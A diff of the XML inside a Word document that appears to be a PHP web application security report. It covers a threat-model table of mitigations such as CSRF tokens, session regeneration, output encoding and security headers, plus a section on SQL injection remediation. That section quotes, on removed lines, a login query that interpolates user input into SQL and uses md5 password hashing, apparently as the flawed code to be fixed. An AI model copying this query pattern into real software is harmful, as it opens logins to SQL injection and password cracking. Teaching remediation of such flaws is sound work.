-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>verify</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>) always runs, even against a dummy hash, so timing doesn't distinguish “no such user” from “wrong password”</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Calibri"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>password_verify() always runs, even against a dummy hash, so timing doesn't distinguish “no such user” from “wrong password”</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1507,50 +1332,35 @@
             <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>security_events</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> table + JSON-line log </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>record</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> every failure/lockout/denial with timestamp, IP, subject</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Calibri"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>security_events table + JSON-line log record every failure/lockout/denial with timestamp, IP, subject</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1581,19 +1391,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Spoofing / </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>EoP</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Spoofing / EoP</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1619,50 +1418,35 @@
             <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>session_regenerate_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>) on every successful login</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Calibri"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>session_regenerate_id() on every successful login</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1720,50 +1504,35 @@
             <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>HttpOnly</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, Secure (prod), </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>SameSite</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>=Lax cookie flags</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Calibri"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>HttpOnly, Secure (prod), SameSite=Lax cookie flags</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1828,52 +1597,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Per-session CSRF token verified with </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>hash_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>equals</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>) on every state-changing POST; token rotates after use</w:t>
+              <w:t>Per-session CSRF token verified with hash_equals() on every state-changing POST; token rotates after use</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1938,52 +1683,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Output encoding (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>htmlspecialchars</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>) on every dynamic value; CSP script-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>src</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 'self'</w:t>
+              <w:t>Output encoding (htmlspecialchars) on every dynamic value; CSP script-src 'self'</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -2054,6 +1775,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -2124,6 +1861,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -2154,19 +1907,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Tampering / </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>EoP</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Tampering / EoP</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -2199,32 +1941,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Content-sniffed MIME check (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>finfo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>), random on-disk filename, storage outside the web root</w:t>
+              <w:t>Content-sniffed MIME check (finfo), random on-disk filename, storage outside the web root</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -2255,19 +1993,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Tampering / </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>EoP</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Tampering / EoP</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -2306,6 +2033,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -2370,43 +2113,28 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Server-side role re-check (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>requireAdmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>)) on every admin request, independent of navigation UI</w:t>
+              <w:t>Server-side role re-check (requireAdmin()) on every admin request, independent of navigation UI</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -2477,6 +2205,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -2507,27 +2251,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Security </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>Misconfig</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>.</w:t>
+              <w:t>Security Misconfig.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2554,45 +2278,14 @@
             <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>display_errors</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>fails</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> closed; CSP, X-Content-Type-Options, X-Frame-Options, Referrer-Policy, HSTS applied globally</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Calibri"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>display_errors fails closed; CSP, X-Content-Type-Options, X-Frame-Options, Referrer-Policy, HSTS applied globally</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2623,17 +2316,16 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>4. Task 2: Authentication Hardening and SQL Injection Remediation</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -2656,10 +2348,10 @@
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -2670,89 +2362,31 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>sql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = "SELECT * FROM users WHERE email = '$identifier' AND password = '</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>" .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> md5($password</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>) .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
